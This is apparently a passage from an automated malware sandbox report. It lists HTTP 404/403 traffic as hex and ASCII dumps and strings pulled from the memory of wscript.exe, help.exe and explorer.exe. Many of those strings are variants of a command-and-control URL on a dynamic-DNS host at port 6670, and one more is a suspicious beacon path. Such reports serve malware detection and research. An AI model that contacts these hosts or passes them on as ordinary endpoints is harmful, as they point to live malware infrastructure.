Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:05:51 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 27 May 2022 17:06:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:06:50 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 27 May 2022 17:07:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:07:42 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:07:42 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:07:42 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
Source: wscript.exe, 00000001.00000003.500327144.00000221822C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.500552314.00000221822C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/
Source: wscript.exe, 00000008.00000002.921930970.0000020FBC219000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6
Source: wscript.exe, 00000008.00000003.465086435.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.921864833.0000020FBC1DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 00000004.00000003.422334361.0000014D0B238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/7DQoJ
Source: wscript.exe, 00000001.00000003.393713330.0000022181D33000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922422358.0000026A515A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.464499048.0000020FBE023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/UZXh0
Source: wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.899394436.0000020FBE9E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 00000004.00000003.550023960.0000014D0BBC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549931938.0000014D0BBA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549990905.0000014D0BBAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922245299.0000026A4F84B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre3
Source: wscript.exe, 00000001.00000003.842626343.00000221FFF32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842357341.00000221FFF28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.908099402.0000022182291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.676181924.00000221822E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842125955.00000221FFF25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.676740678.00000221822E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842440837.00000221FFF2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.676124396.00000221822C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694593679.0000014D0BB9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694902481.0000014D0BBA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694746838.0000014D0BBE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.923829675.0000014D09619000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856325867.0000014D0BBA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694522352.0000014D0BBDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856253293.0000014D0BBA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694954010.0000014D0BBA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716231469.0000026A51A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716617142.0000026A51A22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716721287.0000026A51A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.879090249.0000026A51A3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716693053.0000026A51A25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
Source: wscript.exe, 00000007.00000003.882649285.0000026A5198D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926117959.0000026A51983000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre8
Source: wscript.exe, 00000004.00000003.694438767.0000014D0BC10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre=
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreA%
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreCXRyeSB7
Source: wscript.exe, 00000004.00000003.694438767.0000014D0BC10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716472750.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreH
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreL
Source: wscript.exe, 00000008.00000003.900095109.0000020FBC1FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 00000007.00000003.882772134.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM%
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM7d
Source: wscript.exe, 00000004.00000002.928057135.0000014D0BB43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMP
Source: wscript.exe, 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMV3
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMjdcXHZi
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreN_5
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.883116107.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882795550.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreP
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiUkYirr
Source: wscript.exe, 00000001.00000003.500806397.00000221822B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreR
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreSE
Source: wscript.exe, 00000008.00000002.931688927.0000020FBE9A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreT
Source: wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreU
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.900141906.0000020FBE9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.899755081.0000020FBE9CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.899013643.0000020FBE9CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreX
Source: wscript.exe, 00000004.00000003.549967536.0000014D0BB98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.550053637.0000014D0BBA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ
Source: wscript.exe, 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ3
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrr
Source: wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_
Source: wscript.exe, 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_3
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreageen-usWScript.Quit
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreagent
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 00000007.00000003.712817574.0000026A51A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.715157117.0000026A51A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vred
Source: wscript.exe, 00000008.00000003.900095109.0000020FBC1FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vree5
Source: wscript.exe, 00000004.00000003.856306229.0000014D09618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.923829675.0000014D09619000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856018429.0000014D0960A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.855935009.0000014D09600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreecuritycenter7
Source: wscript.exe, 00000007.00000002.922326377.0000026A4F8C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882416332.0000026A4F8DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre
Source: wscript.exe, 00000004.00000003.694593679.0000014D0BB9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694902481.0000014D0BBA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreem
Source: wscript.exe, 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.915088147.0000020FBC148000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreineer
Source: wscript.exe, 00000007.00000002.926172327.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrej
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrek7
Source: wscript.exe, 00000004.00000002.928037378.0000014D0BB20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vren
Source: wscript.exe, 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.928057135.0000014D0BB43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.928037378.0000014D0BB20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926172327.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.736038236.0000020FBC216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 00000007.00000003.716472750.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo&
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo=
Source: wscript.exe, 00000004.00000003.695080046.0000014D095FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreod
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000001.00000003.500806397.00000221822B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vret
Source: wscript.exe, 00000004.00000002.928127733.0000014D0BBA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrewz
Source: wscript.exe, 00000004.00000003.549967536.0000014D0BB98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.550053637.0000014D0BBA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrezjB
Source: wscript.exe, 00000001.00000002.908343152.00000221FFEBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6ecuritycenter2=
Source: explorer.exe, 00000003.00000000.451561287.0000000008308000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428859791.0000000008308000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.482629137.0000000008308000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://statcounter.com/
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: help.exe, 00000009.00000002.934078297.0000000003DCB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.gabefancher.com
Source: help.exe, 00000009.00000002.934078297.0000000003DCB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.gabefancher.com/np8s/
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: explorer.exe, 00000003.00000000.450826772.00000000080FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
